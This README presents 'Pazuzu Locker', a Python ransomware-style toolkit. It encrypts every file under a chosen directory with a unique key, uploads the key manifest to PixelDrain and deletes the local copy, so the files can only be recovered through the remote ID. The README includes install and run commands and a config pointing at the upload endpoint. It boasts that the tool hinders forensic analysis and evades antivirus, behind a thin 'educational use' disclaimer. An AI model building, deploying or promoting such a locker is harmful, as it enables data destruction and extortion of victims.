File encryption toolkit built with Fernet symmetric encryption. For each file, a unique encryption key is generated, making forensic analysis significantly more difficult. The manifest (CSV file containing file paths and keys) is uploaded to PixelDrain and removed locally. Decryption requires the PixelDrain file ID.
This software is provided for educational and security research purposes only. I am not responsible for any misuse or damage caused by this tool. By using it, you agree to these terms and accept full responsibility for your actions.
- Modern Package Structure - Clean
src/layout with typed configuration - Type-Hinted Codebase - Full type annotations for better IDE support
- Structured Logging - JSON or text format with contextual fields
- Flexible Configuration - TOML files, environment variables, and CLI overrides
- Dry-Run Mode - Simulate operations without modifying files
- Include/Exclude Globs - Fine-grained control over which files to process
- Error Handling - Graceful handling of permission and I/O errors
Requirements: Python 3.10+
- Clone this repository:
git clone https://github.com/natekali/Pazuzu-Locker.git
cd Pazuzu-Locker- Install in development mode:
pip install -e .This will install all dependencies and make the pazuzu command available.
Configuration is managed via config/pazuzu.toml. You can also use environment variables (prefixed with PAZUZU_) or CLI arguments to override settings.
[pazuzu]
start_dir = "/path/to/target"
manifest_dir = "./manifests"
include_globs = ["**/*"]
exclude_globs = ["**/*.pazuzu", "**/.git/**"]
dry_run = true # safe default to avoid accidental encryption
log_level = "INFO"
log_format = "json"
[pazuzu.provider]
name = "pixeldrain"
upload_endpoint = "https://pixeldrain.com/api/file"
download_endpoint = "https://pixeldrain.com/api/file/{id}"Override any config value with environment variables:
export PAZUZU_START_DIR=/home/user/documents
export PAZUZU_LOG_LEVEL=DEBUG
export PAZUZU_DRY_RUN=trueTest that the package loads correctly:
python -m pazuzu_locker --helppazuzu encrypt --start-dir /path/to/targetOr with configuration overrides:
pazuzu encrypt \
--start-dir /path/to/target \
--log-level DEBUG \
--log-format text \
--exclude "**/*.txt"Use the manifest ID returned from encryption:
pazuzu decrypt --manifest-id YOUR_MANIFEST_IDOr set it in config/pazuzu.toml or via environment:
export PAZUZU_MANIFEST_ID=YOUR_MANIFEST_ID
pazuzu decryptTest operations without modifying files:
pazuzu encrypt --start-dir /path/to/target --dry-runpazuzu-locker/
βββ config/
β βββ pazuzu.toml # Configuration file
βββ src/
β βββ pazuzu_locker/ # Main package
β βββ __init__.py # Package exports
β βββ __main__.py # Module entry point
β βββ cli.py # Command-line interface
β βββ config.py # Configuration management
β βββ crypto.py # Encryption/decryption
β βββ logging.py # Structured logging
β βββ manifest.py # CSV manifest handling
β βββ providers.py # Remote storage providers
β βββ workflow.py # Encryption/decryption workflows
βββ pyproject.toml # PEP 621 project metadata
βββ README.md
AppConfig- Pydantic model for application configurationProviderConfig- Configuration for remote storage providersload_config()- Load configuration from TOML, env vars, and overrides
generate_key()- Generate a new Fernet encryption keyencrypt_data()- Encrypt bytes using Fernetdecrypt_data()- Decrypt bytes using Fernet
Manifest- CSV-based manifest for file paths and keysManifestEntry- Single entry in the manifest
ManifestProvider- Protocol for upload/download providersPixelDrainProvider- PixelDrain implementationcreate_provider()- Factory function for providers
encrypt_directory()- Encrypt files and upload manifestdecrypt_from_manifest()- Download manifest and decrypt files
configure_logging()- Set up structured loggingJsonFormatter- JSON log formatter with context fields
Pazuzu Locker can easily bypass many antivirus solutions, making it easier to deploy for security testing purposes.
